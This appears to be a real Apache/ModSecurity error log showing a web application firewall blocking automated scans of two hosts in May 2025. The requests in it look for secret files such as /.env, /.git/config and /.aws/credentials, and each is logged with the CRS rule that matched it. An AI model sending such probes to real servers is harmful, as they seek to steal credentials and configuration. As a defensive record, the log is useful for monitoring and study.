[Sat May 17 01:06:26.298174 2025] [:error] [pid 3216217] [client 45.144.212.129:38746] [client 45.144.212.129] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCfE8vFl0HpQmyKl0MyigQAAAA0"]
[Sat May 17 01:06:26.298559 2025] [:error] [pid 3216217] [client 45.144.212.129:38746] [client 45.144.212.129] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCfE8vFl0HpQmyKl0MyigQAAAA0"]
[Sat May 17 01:06:26.299156 2025] [:error] [pid 3216217] [client 45.144.212.129:38746] [client 45.144.212.129] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCfE8vFl0HpQmyKl0MyigQAAAA0"]
[Sat May 17 01:12:34.319484 2025] [:error] [pid 3217020] [client 93.123.109.105:53360] [client 93.123.109.105] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aCfGYvewL4bDgAv6PCwXdAAAAAI"]
[Sat May 17 01:12:34.319837 2025] [:error] [pid 3217020] [client 93.123.109.105:53360] [client 93.123.109.105] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aCfGYvewL4bDgAv6PCwXdAAAAAI"]
[Sat May 17 01:12:34.320002 2025] [:error] [pid 3217020] [client 93.123.109.105:53360] [client 93.123.109.105] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aCfGYvewL4bDgAv6PCwXdAAAAAI"]
[Sat May 17 01:45:49.239228 2025] [:error] [pid 3216235] [client 45.144.212.129:35238] [client 45.144.212.129] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCfOLWHf-CC06CFOACgY4QAAAAE"]
[Sat May 17 01:45:49.239528 2025] [:error] [pid 3216235] [client 45.144.212.129:35238] [client 45.144.212.129] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCfOLWHf-CC06CFOACgY4QAAAAE"]
[Sat May 17 01:45:49.239706 2025] [:error] [pid 3216235] [client 45.144.212.129:35238] [client 45.144.212.129] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCfOLWHf-CC06CFOACgY4QAAAAE"]
[Sat May 17 08:27:09.186465 2025] [:error] [pid 3218664] [client 54.81.185.130:44672] [client 54.81.185.130] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aCgsPe9IBRO83jsynRVZGwAAAAE"]
[Sat May 17 08:27:09.186799 2025] [:error] [pid 3218664] [client 54.81.185.130:44672] [client 54.81.185.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aCgsPe9IBRO83jsynRVZGwAAAAE"]
[Sat May 17 08:27:09.186970 2025] [:error] [pid 3218664] [client 54.81.185.130:44672] [client 54.81.185.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aCgsPe9IBRO83jsynRVZGwAAAAE"]
[Sat May 17 13:25:35.947787 2025] [:error] [pid 3218665] [client 216.81.248.13:57006] [client 216.81.248.13] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/s3cmd.ini"] [unique_id "aChyL1MsY6wsWbw3bpa1DQAAAAI"]
[Sat May 17 13:25:35.948169 2025] [:error] [pid 3218665] [client 216.81.248.13:57006] [client 216.81.248.13] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/s3cmd.ini"] [unique_id "aChyL1MsY6wsWbw3bpa1DQAAAAI"]
[Sat May 17 13:25:35.948353 2025] [:error] [pid 3218665] [client 216.81.248.13:57006] [client 216.81.248.13] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/s3cmd.ini"] [unique_id "aChyL1MsY6wsWbw3bpa1DQAAAAI"]
[Sat May 17 13:25:52.383870 2025] [:error] [pid 3226368] [client 216.81.248.13:43326] [client 216.81.248.13] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aChyQODg_ZkEnbfYGsbMIwAAAAs"]
[Sat May 17 13:25:52.384137 2025] [:error] [pid 3226368] [client 216.81.248.13:43326] [client 216.81.248.13] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aChyQODg_ZkEnbfYGsbMIwAAAAs"]
[Sat May 17 13:25:52.384318 2025] [:error] [pid 3226368] [client 216.81.248.13:43326] [client 216.81.248.13] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aChyQODg_ZkEnbfYGsbMIwAAAAs"]
[Sun May 18 19:14:49.833664 2025] [:error] [pid 3240158] [client 93.123.109.7:50296] [client 93.123.109.7] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aCoVifYZUdiou7gi4jTowQAAAAI"]
[Sun May 18 19:14:49.834001 2025] [:error] [pid 3240158] [client 93.123.109.7:50296] [client 93.123.109.7] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aCoVifYZUdiou7gi4jTowQAAAAI"]
[Sun May 18 19:14:49.834161 2025] [:error] [pid 3240158] [client 93.123.109.7:50296] [client 93.123.109.7] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aCoVifYZUdiou7gi4jTowQAAAAI"]
[Sun May 18 20:34:10.890209 2025] [authz_core:error] [pid 3256648] [client 46.101.111.185:46692] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun May 18 20:34:11.167114 2025] [:error] [pid 3256681] [client 46.101.111.185:46708] [client 46.101.111.185] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aCooIzhwisL9crUbZywVVgAAAAY"]
[Sun May 18 20:34:11.167332 2025] [:error] [pid 3256681] [client 46.101.111.185:46708] [client 46.101.111.185] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aCooIzhwisL9crUbZywVVgAAAAY"]
[Sun May 18 20:34:11.167488 2025] [:error] [pid 3256681] [client 46.101.111.185:46708] [client 46.101.111.185] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aCooIzhwisL9crUbZywVVgAAAAY"]
[Sun May 18 20:34:11.219329 2025] [:error] [pid 3256683] [client 46.101.111.185:46718] [client 46.101.111.185] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aCooI3PSCjpuR5JPFx_g7wAAAAk"]
[Sun May 18 20:34:11.219560 2025] [:error] [pid 3256683] [client 46.101.111.185:46718] [client 46.101.111.185] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aCooI3PSCjpuR5JPFx_g7wAAAAk"]
[Sun May 18 20:34:11.220386 2025] [:error] [pid 3256683] [client 46.101.111.185:46718] [client 46.101.111.185] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aCooI3PSCjpuR5JPFx_g7wAAAAk"]
[Sun May 18 20:34:11.270880 2025] [:error] [pid 3256649] [client 46.101.111.185:46728] [client 46.101.111.185] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aCooIxj6u7oojdJ-7pbFcAAAAAM"]
[Sun May 18 20:34:11.271097 2025] [:error] [pid 3256649] [client 46.101.111.185:46728] [client 46.101.111.185] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aCooIxj6u7oojdJ-7pbFcAAAAAM"]
[Sun May 18 20:34:11.271245 2025] [:error] [pid 3256649] [client 46.101.111.185:46728] [client 46.101.111.185] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aCooIxj6u7oojdJ-7pbFcAAAAAM"]
[Mon May 19 07:28:08.383948 2025] [:error] [pid 3262387] [client 91.206.169.53:55444] [client 91.206.169.53] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aCrBaHYbKRp9rN3_M5rN_gAAAAs"]
[Mon May 19 07:28:08.384256 2025] [:error] [pid 3262387] [client 91.206.169.53:55444] [client 91.206.169.53] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aCrBaHYbKRp9rN3_M5rN_gAAAAs"]
[Mon May 19 07:28:08.384409 2025] [:error] [pid 3262387] [client 91.206.169.53:55444] [client 91.206.169.53] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aCrBaHYbKRp9rN3_M5rN_gAAAAs"]
[Mon May 19 10:57:12.993977 2025] [:error] [pid 3265507] [client 34.229.113.34:45862] [client 34.229.113.34] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aCryaMfzOxTqgNkm8KQK2wAAAAI"]
[Mon May 19 10:57:12.994346 2025] [:error] [pid 3265507] [client 34.229.113.34:45862] [client 34.229.113.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aCryaMfzOxTqgNkm8KQK2wAAAAI"]
[Mon May 19 10:57:12.994577 2025] [:error] [pid 3265507] [client 34.229.113.34:45862] [client 34.229.113.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aCryaMfzOxTqgNkm8KQK2wAAAAI"]
[Mon May 19 21:55:24.814174 2025] [:error] [pid 3262376] [client 196.251.88.164:52518] [client 196.251.88.164] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aCuMrAoySCWbGajAIfFazQAAAAY"]
[Mon May 19 21:55:24.814475 2025] [:error] [pid 3262376] [client 196.251.88.164:52518] [client 196.251.88.164] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aCuMrAoySCWbGajAIfFazQAAAAY"]
[Mon May 19 21:55:24.814640 2025] [:error] [pid 3262376] [client 196.251.88.164:52518] [client 196.251.88.164] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aCuMrAoySCWbGajAIfFazQAAAAY"]
